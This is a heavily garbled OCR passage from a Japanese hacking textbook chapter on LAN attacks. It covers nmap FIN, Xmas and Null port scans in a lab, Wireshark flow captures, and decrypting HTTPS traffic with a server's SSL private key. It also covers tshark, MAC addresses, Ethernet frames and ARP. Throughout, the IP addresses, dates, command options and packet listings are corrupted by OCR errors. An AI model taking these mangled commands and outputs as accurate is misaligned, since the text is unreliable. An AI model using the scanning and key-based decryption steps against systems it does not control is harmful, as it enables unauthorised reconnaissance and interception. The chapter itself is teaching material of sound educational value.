Note: Host seems down. T 和 † ュ ト t 1s really up, but blocking our pnng 


probes, try -Pn 
Nmap done: 1 TP address (9 hosts up) scanned in 3.98 seconds 


TOoa ロ Cast 


- 昌 (NGD pn PC = じ O BTO IS コ ユ - 
・927418431 PCsComnu-. BroadCast -・@.6 . 16.9. 
B 提 


-B53764342 PcsComnu- BroadCcast ARP 42 who has 19.8.9.4? Te]1 19 


0.000000000 Yihohw100047Tel1000? AP Who hw 10.0047 Te 10.0.0.2 


1027410411 wi ks 10094zTal000? 


2051704342 1 has 10.90.47 Te4 10.0.9 > AP Who hw 10004? Te 10002 


FFP. Who hm 100047 Te 100032 





図 6-26 稼 風 し て いな い 場 合 


ブロード キャ スト に ARP 要 求 を 送り ます が 、 タ ー ゲ ッ ト 端 末 は 稼働 し て いな い 
の で ARP 応 答 が 返っ て きま せん 。 nmap 側 は 3 回 ARP 要 求 を 実行 し て 、 そ れ で も 
応答 が な いた だ た め 、 タ ー ゲ ッ ト 端 末 は 稼働 し て いな いと 判断 し ます 。 

Linux の ping コ マン ド は 、 ICMP エ コー 要求 を 送信 し ます 。 よ っ て 、 nmap で -sP 
オプ ショ ン と -send-ip オ プシ ョ ン を 付け た 場合 は 、Ping よ り る 信頼 性 が 高い と い 
えま す 。 なぜ な ら ば 、 フ ァ イ ア ウォ ー ル が あっ て ICMP エ コー 応答 を 返さ な く て 
も 、TCP パ ケッ ト に は 応答 を 返す 可能 性 が ある た めで す 。 nmap で あれ ば 、 そ う 
いっ た 端末 を 稼働 し て いる と 識別 で きま す 。 
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(⑥ FIN スキ ャ ン を 調査 する 

nmap に は 、 普通 で は な い パ ケッ ト を 送り 、 そ の 反応 か ら サ ービス が 動い て いる 
か を 確認 する スキ ャ ン が あり ます 。 FIN スキ ャ ン 、Xmas ス キャ ン 、Null ス キャ ン 、 
ACK ス キャ ン な ど が そう で す 。 

ここ で は FIN ス キャ ン に つい て 調査 し ます 。 FIN ス キャ ン で は 、FIN パ ケッ ト 
(FIN フ ラグ を 設定 し た TCP パケ ッ ト ) を 送信 し ます 。FIN パケ ッ ト は 、 通 信 終 了 
要求 に 使わ れ ま す が 、 人 通信 前 に いき な り FIN パ ケッ ト を 送信 し て 端末 の 様子 を 待 
ち ま す 。 

開い て いる ポー ト 21 (FTP) に 対し て FIN ス キャ ン し て み ま す ( 図 6-27)。 


Foot 同 ka11:<# nmap -sF -p 21 19.9.9.5 

Starting Nmap 7.79 ( https : //nmap.org ) at 2918-98-11 13:98 JST 
Nmap scan report for 19.9.9.5 

Host is up (9.99922s latency ) 


PORT STATE SERVICE 
21/tcp openlfi1tered ftp 
MAC Address: 98:99:27:8F :BD:89 (Oracle Virtua1Box virtual NTC) 


Nmap done: 1 TP address (1 host up) scanned 1n 9.45 seconds 


下 jp.mddr *= 10.0.0.5 


Time 


TOP.45218 っ 31 IFIN] Scq=1 Wins 1074 Lens0 
TCP 45219 > ヶ 1 IFIN] Seq=1 Wim= 1024 Ln-0 





図 6.27 ポー ト が 開い て いる 場合 


FIN パケ ッ ト を 送信 し て いま す が 、 応 答 が あり ませ ん 。 ポ ー ト が 開い て いる 場 
合 、 通 常 は 応答 が あり ませ ん 。 ま た フィ ル タ リ ング され て いろ る と き に も る 応答 が あ 
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り ま せん 。 よ っ て 、|openfiltered」 と 判断 し て いま す 。 ち な み に 、Windows 糸 OS 
は FIN スキ ャ ン に 対し て 反応 し ませ ん 。 逆 に いえ ば 、OS が Windows か 償 か を 識別 
する 材料 と し て も 用 いら れ ま す 。 

閉じ て いる ポー ト に 対し て FIN ス キャ ン し て み ま す ( 図 6-28)。 


Foot 同 kal1:< 井 nmaD -SsF -p 24 19.9.9.5 

Starting Nmap 7.79 ( https ://nmap.org ) at 2918-98-11 13:12 JST 
Nmap scan Peport for 19.9.9.5 

Host 1s up (9.99937s latency ) . 


PORT STAIE SERVICE 
24/tcp closed priv-mai1 


MAC Address: 98:99:27:8F :BD:89 (Oracle Virtua1Box virtual NIC) 


Nmap done: 1 TP address (1 host up) scanned 1n 9.27 seconds 


ip.a3dr == 10.00.5 回 に コ ・ Expression。 + 


Soufce Destinaton Protocol Lenqth Info 


Wireshark・Flow ・wireshark-ethO- 20180611131253-PTKWIh pcapng 


10.0.0.2 
1000.5 











図 6.28 ポー ト が 閉じ て いる 場合 


FIN パ ケッ ト を 送信 し た と き に 、TCP パ ケッ ト (RST/ACK) が 返っ て くれ ば 、 
ポ ボート は 閉じ て いる と 判断 し ます 。 


⑦ Xmas スキ ャ ン を 調査 する 

Xmas スキ ャ ン を 調査 し ます 。Xmas ス キャ ン で は 、TCP パ ケッ ト (FIN/URG/ 
PUSH の 3 つの フラ グ を 設定 ) を 送信 し ます 。 

開い て いる ボー ト 21 (FTP) に 対し て Xmas スキ ャ ン し て み ま す ( 図 6-29) 。 
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root 同 ka11:< 井 nmaD -SsX -p 21 19.9.9.5 

Startng Nmap 7.79 ( https : //nmap .org ) at 2918-98-11 13:17 JST 
Nmap scan report for 19.9.9.5 

Host 1s up (9.99926s latency ) 


PORT STATE SERVTCE 
21/tcp openlfi1tered ftp 


MAC Address: 98:99:27:8F:BD:89 (Oracle Virtual1Box virtual NIC) 


Nmap done: 1 TP address (1 host up) scanned in 9.49 seconds 





鹿 ip.a9d == 10.0.0.5 


Source Destination Protocol Lenqth Info 


Wiresihark .Flow ・ wireshark-eth0- 20180811131743-VaqiFU.pcapng 


10.0.0.5 


0.0883868952 TCP 4481S っ 21 FIN. PSHL URGI Scq=1 Wins 1024 Ua=-- 
0.18&724563 TCP 44816 ふ 21 FIN、PFSH URGI Seq= 】 Win 1024 WW.。 


図 6.29 ポー ト が 開い て いる 場合 





閉じ て いる ボー ト に 対し て Xmas スキ ャ ン し て み ま す ( 図 6-30)。 


root⑱ka11:< 芋 nmaD -SX -p 24 19.9.9.5 

Starting Nmap 7.79 ( https : //nmap .org ) at 2918-98-11 13:29 JST 
Nmap scan report for 19.9.9.5 

Host 1s up (9.99939s 1atency ) - 


PORT STATE SERVICE 
24/tcp closed pr1v-ma11 


MAC Address: 98:99:27:8F :BD:89 (Oracle VirtualBox v1rtual NTC) 


Nmap done: 1 TP address (1 host up) scanned in 9.28 seconds 
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上 lpaddrss10005 
Np. 





Wiresherk - Flow -wireshsrk_eth0-20180811132017-7qWiky.pcapng 


10.0.0.2 
10.0.0.5 


Seq = 1 


Seq・1 rk< う 2 





図 6-30 ポー ト が 閉じ て いる 場合 


TCP パケ ッ ト (RST/ACK) が 返っ て きた と き に 、 ポ ボー ト が 閉じ て いる と 着 断 
し ます 。 


8⑧ Null ス キャ ン を 調査 する 

Null ス キャ ン を 調査 し ます 。Null ス キャ ン で は 、 何 の フラ グ も 設定 し な い TCP 
パケ ッ ト を 送信 し ます 。 

開い て いる ボー ト 21 (FTP) に 対し て Nul ス キャ ン し て み ま す ( 図 631) 。 


Poot 細 ka11:<# nmap -sN -p 21 19.9.9.5 

Startng Nmap 7.79 ( https ://nmap.org ) at 2918-98-11 13:27 JST 
Nmap scan Peport †or 19.9.9.5 

Host 1s up (9.99926s latency ) . 


PORT STATIE SERVICE 
21/tcp openlfi1tered ftp 


MAC Address: 98:99:27:8F:BD:89 (Oracle VirtualBox virtual NTC) 


Nmap done: 1 TP address (1 host up) scanned in 9.48 seconds 
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回 に 3 ー| Expression- 


Wireshawk・Flow ・wireshaik-ethO- 20180811133023-wyS41Y.pcapng 


Time 10.0.0.2 C 


10.0.0.5 


0.096650027 39e 3 きっ > 2 [oo] Se=1 WWn=1Ce っ TO 33398 っ 21 KNonez] Scq・1 Winr1024 Lenr0 
0.197159505 9 399 >21 =1 Wan=16 っ TP. 33399 っ 21 に Nonez] Scq*1 WOnr1024 lensO 





図 6.31 ポー ト が 開い て いる 場合 


応答 が な い 場 合 に は 、| open'filtered」 と 判断 し ます 。 な お 、 フ ロー 図 の 画面 に 
て 、 こ の 特殊 な TCP パケ ッ ト だ け を 表示 する た め に 、|Flow type」 を |TCP 
Flows」 に する と 、Wireshark が 落ち る の で 注意 し て くだ さい 。 

閉じ て いる ボー ト に 対し て Null ス キャ ン し て み ま す ( 図 6-32)。 


Foo て 細 ka11:<# nmap -sN -p 24 19.9.9.5 

Starting Nmap 7.79 ( https : //nmap .org ) at 2918-98-11 13:29 JST 
Nmap scan report for 19.9.9.5 

Host 1s up (9.99934s latency ) . 


PORT STATE SERVICE 
24/tcp closed priv-mai1 


MAC Address: 98:99:27:8F :BD:89 (Oracle Virtua1Box virtual NTC) 


Nmap done: 1 TP address (1 host up) scanned in 9.28 seconds 


月 paddr == 10.0.0.5 


Wireshark・Flow ・wireshark-ethO- 20180611132905- kgZcVLpcapng 


10.0.0.5 Comment 


0.104130549 [ | 24 TOF_ 58454 24 に None>] Smw・ 1 Wans1024 し me0 
0.104913228 > 5054 1RST. ALKI Seq=1 Ak -/ TCP 24 + 55464 記 5T. ACK] Seq・ 1 kk 1 Win=0 Lems0 





図 6.-32 ポー ト が 閉じ て いる 場合 
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TCP パケ ッ ト (RST/ACK) が 返っ て きた とき に 、 ポ ボー ト が 閉じ て いる と 首 断 
し ます 。 


で SSL の セッ ショ ン を 人 復元 する 

Wireshark は LAN ア ダ プ ター で パケ ッ ト を 取得 する の で 、 ア プリ ケー ショ ン で 
暗号 化 さ れ て いる 通信 は 暗号 文 の まま 表示 され ます 。 例え ば 、 HTTPS の パケ ッ ト 
は Info 列 に "Application Data と 表示 され ます 。 内 容 を 見 て も Encrypted 
Application Data' (暗号 化 さ きれ た アプ リケーション デー タ ) と 表示 され 、 平 文 の 内 
容 は 表示 され ませ ん ( 図 6-33) 。 


ーー 
4 る ょ 所 離 牛 く と = 生き 国 国 AA 


まわ = 
Server Pello。 (Certificate。 Sermver He]Jo Domwe 

51695 = 4q13 [ALK] Scqr161 ん ck=&47 Min= う 24260 Lem の 9 TSys]・@O0011169 TSccr。 | 
(lient Key Exchange 

Change (lpher Spec | 
Encrypted Handshnke Message 

443 = 51695 [ALK] Sew*$47 Ake う 7 Mim で の 712 Lem の TSyvaj< ハ 6515) TSerrm<⑥5 し に 
(hange (Cipher Spec。 Encrypted Handshpke Itessase 

51695 = 343 [ALK] Seq*327 Ark-O00 Min< う 24280 Lcm<9 TSYvs]-S911170 TSecr。 
App11cation Deta 
App11cation Data。 Aop13cat3om Data 

51695 = 443 [ACK] Seqr732 ke1505 Mine う 24280 Lemx9 TSva]・$20011170 TSec.。。 一 


を 


| FFPwmo 25: 56 ytes GW wire (5344 bdts)。 560 bytes Capturwd (5144 bits ) 
: EtNwerngt iT,。 Src: InteliCor 34:94:c3 (BB:19:d2:34:94:c ヨ 3)。 Dst: APO1e 3 と ff:S2 (GO:26:bb: 1 て:ff:52) 
: Intwrngt ProtGcol Version 衝 。 SC 392.16 間 100. き 。 De て : 319 は.16 き . 399.3 
: Tmanswission Cowtrol Protocol 。 Src Porti 34343 (443)。 Dst Port: 51695 (5169?) 。 Seq: S06。 Ak: 732。 Lem: 692 
- SecuFo Seckgts Lavor 
2 LSV1 才 CO は LayeFi ADDLICatIGn Data PPGtOCGI: ht の 
Content Type: APe11cation Data (2 コ ) 
Veors3on: TLS 1. は (BixB]91}) 
LenWthi 叶 I6 
Encryptod APP1tcaton Bata: 13deda887c1fewc ヨ 3d42c71531fG1462feoocd55 291ef わ 3e- - - 
TLSV1 首 NCOPG LayeFi ADDLICat1GN Data Prmot0COl:i ht て 人 


生 アプ Pod ii mmewi wokwtn Ga lrelao 23wl lt rwe | Pecktte 5 ・Cwwlewvd 芝 OO0O・ Lted nee 0010 ho WAN 





図 6.33 HTTPS の パケ ッ ト 内 容 


これ を 人 復号 する に は 、Web サーバー が 保持 する SSL 秘密 鍵 を Wireshark に 登録 
し ます (15)。 


*15 : この アプ ロー チ が 利用 で きる の は 、Web サ ー バ ー が 自分 の 管理 下 に ある 場合 の み と い えま 
す 。 こ れ を 実現 で き な い 場合 に は 、mitmproxy や Fiddler の よう な HTTP Proxy が 有効 で す 。 





458 | 第 2 部 | ハッ キン グ を 体験 する 


①SSL 秘密 鍵 を 入手 する 
Apache の 設定 ファ イル を 参照 し 、SSL 秘密 鍵 の 位置 を 特定 し て 、SSL 秘密 鍵 を 
入手 し ます 。 


②)SSL 秘密 鍵 を 適用 する 

Wireshark の メニ ュー の |Edit」 > 「Preferences」 を 選び 、Preferences 画 面 を 
表示 し ます 。 こ の 画面 の 左 ペ イン の 「Protocols」 > 「SSL」 を 選ぶ と 、SSL の 設定 
を 適用 で きま す 。RSA keys list の 右側 の [Editl ボタ ン を 押し ます ( 図 6-34)。 





SNMP * cmwre Sockwts Laywr 
RS ks let | cdtss 


55L weue he 


SouBeew 
SUDHIWTCP 


Fse rb 55L reccrh spParming mml T じ ドキ cegrmants 
wwecrrblk 35L wselcqon bwte cpeerwe mp SSL reoorde 
曲 Meszose PhcmicXon Ocde AOX iore "mse lee 
Pm-Sed-ioy 所 = 

IFre MKycter -Secrm1 ce fiemaore 








図 6-34 Preferences 画 面 


下 の [|+」 ボタ ン を 押す と 、 サ ー バ ー 情 報 を 追加 で きま す ( 図 6.35)。IP address 
に サー バー の IP アド レス 、port に 443、Protocol に http を 入力 し 、「Key File」 の 
と ころ に SSL 秘密 鍵 を 指定 し ます 。 鍵 が パス ワー ド で 保護 され て いる 場合 に は 、 
パス ワー ド 入 力 画面 で パス ワー ド を 入れ ます 。 [OK] ボタ ン で 反映 させ る と 、 
Wireshark は 自動 的 に 鍵 を 適用 し ます 。 





| 第 6 章 | LAN の ハッ キン グ 459 


有 P oddrcss Polt Potpccl Ker le 
192.369.100.4 443 DPE 





図 6-35 SSL 秘密 鍵 の 設定 


入力 し た 情報 が 正しけれ ば 、 復元 され た セッ ショ ン の 内 容 が 見 られ る は ず で す 。 
下 に |Decrypted SSL datal タブ が 追加 され て お り 、 そ こ か ら 内 容 を 確認 で きま 
す ( 図 6-36)。 


SI pm 


dm のり 記 愉 コ く テー 守 です ュ 国 国 A&& 理 
adsply iii Di に の 
む CH IKRate Snurce [siraimm jmio 
192 153 19 4 19 ょ 。 16$ , 199 Seruer He110。 Cert1lf1cate。 Serwer 
192 .166 160.2 192 . 16$ 106 .4 51695 ・ 443 [ACK] Seq-161 Ack=G427 | 
197 . 158 . 1609 2 19# . 168 . 1 .4 (13ont oy Exchange 
192.356$.190.2 192.368 . 100 .4 Change て 3phor Spec ド | 
197 158 , 169 2 197 165 . 196 4 finmished 
192.1658 , 199 .4 492 .165 . 1909 2 443 - 51695 [AXK] Seq・=847 Ack=327 
192 . 163 . 169 .4 192 .168 . 196 .2 Change Cipher Spec。「inished 
197 . 158 . 1009 . う 19 ょ # . 168 . 190 .4 KPp 51695 = 443 [AX] Seq=】37 Acks66 
192 . 158 . 160 2 193 . 158 . 190 .4 HT Ti GET /1ndox.html HTTP/3 .4 


192 .168.190.4 。 192.168.190.2 HIIP HITP/1。1 209 OK (text/html 
192.168.199.2 192.168.499.4 TCp 51695 ・ 443 [ACK] Seq-732 Ack-1596 


人 RE # 
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) Ethermet IT。 Src: Inte1COrn 39:99:C3 (09!19:d2:39:99: て で 3) 。 Dst: APP1e 1C: す TS2 (96:26 1:bD:1C:fT:52) 

| ntermet Protoco1 Versorn 4。 Src: 192.168 .1906.4 。 Dst: 192.168 .169.2 

ィ 2 ramsmissipm (Comtro] Protoco1 。 Src Port: 3 (4 も 33) 。 Dst Port: 51695 (51695 ) 。 Soq : 996。 Ack: 732。 Lan: 692 
Sourcw Port: 441 
Dest1mat10n POrt: 515395 
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図 6-36 Decrypted SSL data 
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有 tshark で パケ ッ ト を キャ プチ ャ する 


パケ ッ ト キ ャ プチ ャ は 重い 処理 で す が 、Wireshark は GUI な の で より 重く な り 
が ち で す 。 そ の た め 、 長 時 間 パ ケッ トキ ャ プチ ャ する の で あれ ば 、CUI ベ ー ス の 
tshark や tcpdump が 向い て いま す 。 

ここ で は tshark を 紹介 し ます 。 こ れ は Wireshark の コマ ンド ライ ン 版 な の で 、 
Wireshark を イン スト ー ル し て いる 環境 で あれ ば すでに 存在 する は ず で す 。 

例え ば 、eth0 の LAN ア ダ プ ター に て 2 つの パケ ッ ト を キャ プチ ャ する に は 次 の 
よう に 入力 し ます 。 


ーーー-。 ーーー ーー ーー ーーーーーーーーーーー ーーーー 一 上 に ー 
| 警告 が 表示 され る 





root で 実行 する と 、 警告 が 表示 され ます 。 こ の 警告 を 消し た い 場 合 に は 、 管理 者 
権限 以外 の ユー ザー (例え ば tshark 専 用 ユー ザー) で tshark を 実行 し ます ("16)。 

tshark で も Wireshark と 同様 に フィ ル タ を 適用 で きま す 。-Y オ プシ ョ ン (17) 
は 表示 フィ ル タ 、f オ プシ ョ ン は キャ プチ ャ フィ ル タ を 指定 する た め に 用 いま す 。 
例え ば 、 DNS の 通信 、 す な わ ち 53 番 ポー ト の UDP だ け を キャ プチ ャ し て 、「traffic. 
pcap ファ イル に 出力 する に は 、 次 の よう に し ます 。 





その 他 の オプ ショ ン に つい て は 、man tshark コマ ンド で 確認 し て くだ さい 。 
Wireshark で の キャ プチ ャ を tshark で どう 実現 する の か と いう 角 点 で 調べ る と よ 


*16 : https//wikiwiresharkorg/CaptureSetup/CapturePrivileges 


*17 : 昔 は -R オ プシ ョ ン で し た が 、-Y オ プシ ョ ン に 変更 され まし た 。 表示 フィ ル タ は 標準 出力 に 対 
し て 適用 され ます 。 
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yy し ょ 才 。 


Wireshark に は 様々 な ツー ル が 付属 し て いま す 。 こ こ で は CUI で 操作 で きる 
ツー ル を 紹介 し ます ( 表 66)。 


表 6-6 CUI の Wireshark 付 属 の ツー ル 


ター ル 名 | 要 生 > 
キャ プチ ャ に 特 化し た 小さ な プロ グラ ム 。 長 時 間 の キャ プチ ャ に 向く 。 
キャ プチ ャ ファ イル の 統計 情報 を 確認 する 。 キ ャ プチ ャ の 時 間 な ど が わか る 。 


キャ プチ ャ ファ イル を 分 割 ・ 編 集 する 。 
キャ プチ ャ ファ イル を 連結 する 。 
テキ スト ファ イル か ら pcap ファ イル に 変換 する 。 













誠 WAC アド レス に つい て 


MAC ア ドレ ス は 、XX:XX:XX:XXX:XXX:XX ( 誠 は 16 進 数 形式 ) で 表現 され る 識別 
子 で す 。 基 本 的 に MAC ア ドレ ス は 、LAN ア ダ プ ター ご と に 固有 の 値 が 割り 当て 
られ る こと に な っ て いま す 。LAN ア ダ プ ター の ハー ドウ ェ ア 上 の ROM に 書き 込 
まれ る こと も ある だ た め 、 ハ ー ド ウェ アア ドレ ス や 物理 アド レス と 呼ば れる こと も 
あり ます 。 


代 MAC アド レス の 確認 方 法 


Windows で MAC ア ドレ ス を 確認 する に は 、 コ マン ド プ ロン プ ト あ る い は 
PowerShell で jpconfig /al コ マン ド を 実行 し ます 。 


C:\Users\ipusiron>1pconfig /a11 


Mindows IP 構成 
( 略 ) 
イー サ ネ ッ ト アダ プター Npcap Loopback Adapter: 
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接続 固有 の DNS サフ ィ ッ クス . . . : 


説明 .. . . . .. . . . . . .. . : Npcap Loopback Adapter 
物理 アド レス 。 。 。 . . . 。 . . . . : 92-096-4C-4F-4F-56 
DHCP 有効 は Sa ee 
自動 生成 有 靖 | 。。。。、。 。 。 、 。 : は い 
リン クロ ー カ ル IPv6 アド レス . . . . : fe89: :69c3:ff3:b51d:eac8%27( 優先 ) 
自動 構成 rrv4 アド レス . . . . . . : 169.254.234.269( 優 先 ) 
才 流 まり 富 穫 人 が 。 。 。。 ee ま SS255.9:9 
デメ オル ゲー ドジ エイ 。 。 。 。。 
EEVB 山肌 時 Oo ao ee an repo VaR39844 
DHCPvV6 クラ イア ント DUID. . . . . . . . : 99-91-99-91-1E-95-38-3A-.-」 
F9-DE - F1-E3-9B-96 
BNS 引 ー 人 一 。 。 。 0 。 。 SA 。 を 569:9: の FEF:s3%3 
fec9: の : の 9: 和 †fff: : 2%1 
Tec の : の 9: の : 和 † 和 ff : : 3%1 
NetBT0S over TCP/IP . . . . . . .: 有効 
( 略 ) 


一 方 、Linunx で MAC ア ドレ ス を 確認 する に は 、Terminal で ifconfig コ マン ド を 


実行 し ます 。 


root 令 al11:<# 1 和 TcCoOnfig 
eth9: lags=4163<UP,BROADCAST , RUNNING,MULTICAST> mtu 1599 


inet 192.168.1.4 netmask 255.255.255.9 broadcast 192.168.1.255 
inet6 fe89: :a99:27ff:fe2f:8544 prefixlen 64 scopeid 9x20<]ink> 
inet6 249d:9:2b97:cc99:a99:27ff:fe2f:8544 prefixlen 64 scopeid 


9x9<globa] > 


( 略 ) 


ether 98:99:27:2f:85:44 txqueuelen 1999 (Ethernet) 
RX packets 123992372 bytes 125867779292 (117.2 GiB) 

RX errors 9 dropped 9 overruns 9 frame 9 

TX packets 385582 bytes 276479532 (263.6 MiB) 

TX errors 9 dropped 9 overruns 9 carrier 9 col1isions 9 
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また 、ip addr コ マン ド で も 表示 で きま す 。 


FootWka11:<# iD addr 
( 略 ) 
2: eth9: <BROADCAST,MULTICAST,UP,LOMER_UP> mtu 1599 qdisc pfifo fast ._ 
state UP group default qlen 1999 
1ink/ether 98:99:27:2f:85:44 brd ff:ff:ff: 和 ff:ff: 和 ff 
inet 192.168.1.4/24 brd 192.168.1.255 scope global] eth9 
Valid 1ft forever preferred 1ft forever 
inet6 249d:9:2b97 :cc99:a99: 27ff:fe2f:8544/64 scope globa1 
dynamic mngtmpaddr 
Valid 1ft 14245sec preferred 1ft 14245sec 
inet6 fe89: :a99:27ff:fe2f:8544/64 scope 1ink 
Valid 1ft forever preferred 1ft forever 


旬 MAC アド レス は 何 に 使う の か 

同一 ネッ トワ ー ク 内 で は 、 一 般 に Ethernet と いう プロ トコ ル で 通信 され て いま 
す 。PEthernet で は MAC ア ドレ ス で 送信 元 ・ 宛 先 が 決ま り ま す 。 し か し 、Ping す る 
と き に 、IP ア ドレ ス は 指定 し ます が 、MAC ア ドレ ス は 指定 し て いま せん ("18)。 
こう し た 状況 で も 裏 で は MAC ア ドレ ス を 使わ れ て いま す 。 ど の よう に し て いる 
か と いう と 、 宛 先 IP アドレス か ら 宛 先 MAC ア ドレ ス を 特定 する 処理 を 実行 し ま 
す 。 こ の 処理 を 簡単 に 説明 する と 、 次 の よう に な り ま す 。 

端末 は IP アド レス と MAC ア ドレ ス の 対応 表 (ARP テ ー ブ ル と いう ) を 保持 し 
て いま す 。 ARP テ ー ブ ル で IP アド レス を 検索 し て 、 対 応 す る MAC アド レス を 調 
べ ま す 。 見 つか ら な けれ ば 、ARP と いう プロ トコ ル を 用 いて IP アド レス か ら 
MAC ア ドレ ス を 調べ ます 。ARP の 結果 、MAC ア ドレ ス が 特定 され 、 次 回 に 備え 
て ARP テ ー ブ ル に 追加 し ます 。 

ここ で は Ethernet の 詳細 に つい て は 触れ ませ ん が 、 送 信 元 MAC ア ドレ ス と 多 


*18 : 送信 元 MAC ア ドレ ス 、 送 信 元 IP アド レス 、 宛 先 MAC ア ドレ ス 、 和 宛先 IP アド レス の うち 、 
未知 の 情報 は 宛先 MAC ア ドレ ス だ け で す 。 送信 元 MAC ア ドレ ス と 送信 元 IP ア ドレ ス は 、 送 信 
元 自身 の 情報 な の で 既知 で す 。 ま た 、 宛 先 [DP ア ドレ ス は 、 通 信 プ ログ ラム 側が 知っ て いる か 、 
ユー ザー が 入力 し て いる の で 、 怒 知 で す 。 
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先 MAC ア ドレ ス が 必要 と いう こと を 知っ て お いて くだ さい (19)。 

Wireshark で キャ プチ ャ し た パケ ッ ト を 確認 し て み ま す 。 例え ば 、Protocol が 
TCP の パケ ッ ト を 選択 し ます 。 内 部 に は Ethernet II (Ethernet ver2) 、Internet 
Protocol Version 4 (IPy4) 、 Transmission Control Protocol (TCP) と 並ん で いま 
す 。 つ まり 、 こ れ は TCP を 含む Ethernet フ レー ム だ っ た わけ で す 。 厳 審 に は 、 パ 
ケッ ト で は な く フ レー ム が 一 覧 表示 され て いた こと に な り ま す ( 図 6-37)。 






Fe Et Waw Co Caturo Arewpo Shtihon fmpesew Wireimss scim iiep 
さき 。 天 邊 4 デュ モミ ョ 同国 全く Sg 










IETSET 52 Rx CN Raw 5ma Da Petea 1 = 

20 33.176743 Wistroni_e3:9b:90 。 rowecent AP eo hew 1352.168.3.99) Tei】 

204 33.21267 192.168.1.20 192.366.1.3 WWr Cevt must som 

295 33.217274 192.158.1.29 19.165.1.23 Tr Cevt1rusthom 

200 3).237326 192.169.1.31 197.166.1. TP <)639 = )505 [AXj yeeri6: 

の げ 3.41 うす 19 す - 1 1. よ 1 1 が 0.1. 3 し ト っ tert ir を Sn 
209 33.25ghee 19.1sa-120 39.365- お [TP] 33W・4BB4[MXI ei 

209 1.6583jb fs: :7596:ebi 173。 ff09: っ SEAWC < HTTP/1-1 

21! 39.17W706 Wistmomni_c:9b:90 。 rewcest AP 

3 ナ 5633 19.36-1 7 1 が. 56123 TK Ethernet 7 ヘッ ダー 

213 34.229233 190.358.1. う * 192.368.1.33 Tkr と デー と 

214 36.225584 192.359.1.31 19#.366.1. 計 TCP ee コト 1E9 送信 元 MAC ア ド レス 

21% 30.229473 192.169.1.31 192.16W 1.W Py = っ 
エーーー トー 12.158.1.29 PE 粒 症 DeStinatlon(Dst) : 苑 先 WAC ア ドレ ス 


 。 Fn RI KW huto< mn cts ARN NTY<1 Rhuto< rSnYnmwd Aa htT で \ mm Sntaef ュ ro 
< Ethertwt 11。 Srci Mistrowl_94ia2 ま (97iOei64 Is2 56) 。D5t」 Mistror c3i20 3b (fWiw if1iedi9b( 員 ) 
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図 6-37 TCP を 選択 し た と ころ 


*19: ネ ットワーク の 基本 や 通信 プロ トコ ル の フォ ー マ ッ ト に つい て は 、 ネ ットワーク の 専門 書 を 
参照 し て くだ さい 。 
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Ethernet フ レー ム の フォ ー マ ッ ト 


Ethernet フ レー ム は 、 図 638 の よう な フォ ー マ ッ ト に な っ て いま す 。 


プリ アン ブル Ethemet フ レー ム 








4 バイ ト 





図 6-38 Ethemet フ レー ム の フォ ー マ ッ ト 


そし て 、Ethernet フ レー ム は 、 表 6-7 の 要素 か ら 構 成 さ れ て いま す 。 


表 6-7 Ethermet フ レー ム の 構成 要素 


構成 要素 。 バイ ト 数 


と ツ 販 レ ーー テー ーー 一 
プリ アン ブル フレ ー ム 長 に は 入れ な い 。 


宛先 MAC アド レス 6 バイ ト 宛先 端末 の MAC ア ドレ ス 。 
送信 元 MAC ア ドレ ス |6 バ イト 送信 元 端 末 の MAC ア ドレ ス 。 





デー タ の タイ プ の 識別 番号 。 主 な タイ プ 値 (16 進 
数 ) は 、 次 の 通り 。 

* Ox0800 : IPv4 

* Ox0806 : AHP 

* Ox8100 : IEEE 802.1Q (タグ VLAN) 

* Ox86qdd : IPV6 

*・ Ox888e : IEEE 802.1X (EAPOL) 
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Ethernet が 運ぶ デー タ 。 上 位 の ネッ トワ ー ク 層 の プ 
ロト コル の デー タ が 格納 され る 。 

46 一 1.500 バ イト | 例え ば 、IP パ ケッ ト や ARP パケ ッ ト な ど が 多い 。 
ここ に 格納 で きる デー タ の 最大 値 を MTU と いう 。 
Ethernet の MTU は 1500 で ある 。 


CRC に より 通信 エラ ー を 誤り 検知 する 。 

デー タ だけ で な く 、Ethernet ヘ ッ ダ ー も チェ ッ ク す 
る 。 エ ラー を 検出 し た ら 破 棄 す る 。 

Ethernet レ ベル で は 破棄 し た フレ ー ム を 再送 する 
仕組 み は な く 、TCP な どの 上 位 の プロ トコ ル で 再送 
され る 。 





誠 ARP の 仕組 み 

ARP (Address Resolution Protocol) は 、ITP ア ドレ ス か ら MAC ア ドレ ス を 調べ 
る プロ トコ ル で す 。ARP で 用 いら れる メッ セー ジ に は 4 種類 が あり ます が 、 重 要 
な の は ARP 有 要求 (ARP リ クエ スト ) と ARP 応 答 (ARP リ プラ イ ) で す 。 

ARP 要 求 に は 、 送 信 元 IP アド レス と 送信 元 MAC ア ドレ ス が 設定 され て いま 
す 。 宛 先 IP アド レス に は ター ゲッ ト 端 末 の IP アド レス を 設定 し ます (この TP アド 
レス の MAC ア ドレ ス を 知る こと が 目的 )。 そし て 、 宛先 MAC ア ドレ ス に は プロ ー 
ドキ ャ スト アド レス (FF:FF:FF:FEF:FE:FF) を 設定 し て 送信 し ます 。 これ を ARP 
プロ ー ド キャ スト と いい ます 。 す る と 、 プ ロー ドキ ャ スト な の で 、 ネ ットワーク 
内 の 全 端 末 に 届き ます 。 

ARP 要 求 を 受け 取っ た 端末 は 、 宛 先 エ TFP アド レス が 自分 の IP アド レス と 一 致し 
て いれ ば 応答 し 、 そ う で な けれ ば 無視 し ます 。 こ の 応答 に 使わ れる の が ARP 応 答 
で す 。ARP 有 要求 を 送っ た 端末 に 対し て 、「 そ の 衝 先 中 アド レス は 私 で す 」 と 応え 
ます 。 こ の ARP 応 答 の 送信 元 MAC ア ドレ ス に は 、 応答 する 端末 の MAC ア ドレ ス 
が 入っ て お り 、 タ ー ゲ ッ ト 端 末 の MAC ア ドレ ス に 合致 し ます 。 

この よう に ARP 要 求 と ARP 応 答 を 通じ て 、 宛先 MAC ア ドレ ス を 特定 で きま す 
( 図 6.39) 。 
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192.168.1.5 








AA 
192.168.1.6 
am BB:BB:BB:BB:BB.BB 
192.168.1.4 
192.168.1.7 
CC:CC:CC:CC:CC:CC 
192.168.1.5 
192.168.1.6 
BB:BB:BB:BB-BB.BB 
192.168.1.7 
CC:CC:CC CCCCCC 


図 6-39 ARP の 仕組 み 


この 時 点 で 端末 は 、MAC ア ドレ ス と IP アド レス の 対応 を ARP テ ー ブ ル に 一 時 
的 に キャ ッシュ し ます 。 以降 の 通信 で は ARP テ ー ブ ル を 用 いて 、 宛 先 MAC ア ド 
レス を 特定 し ます 。 

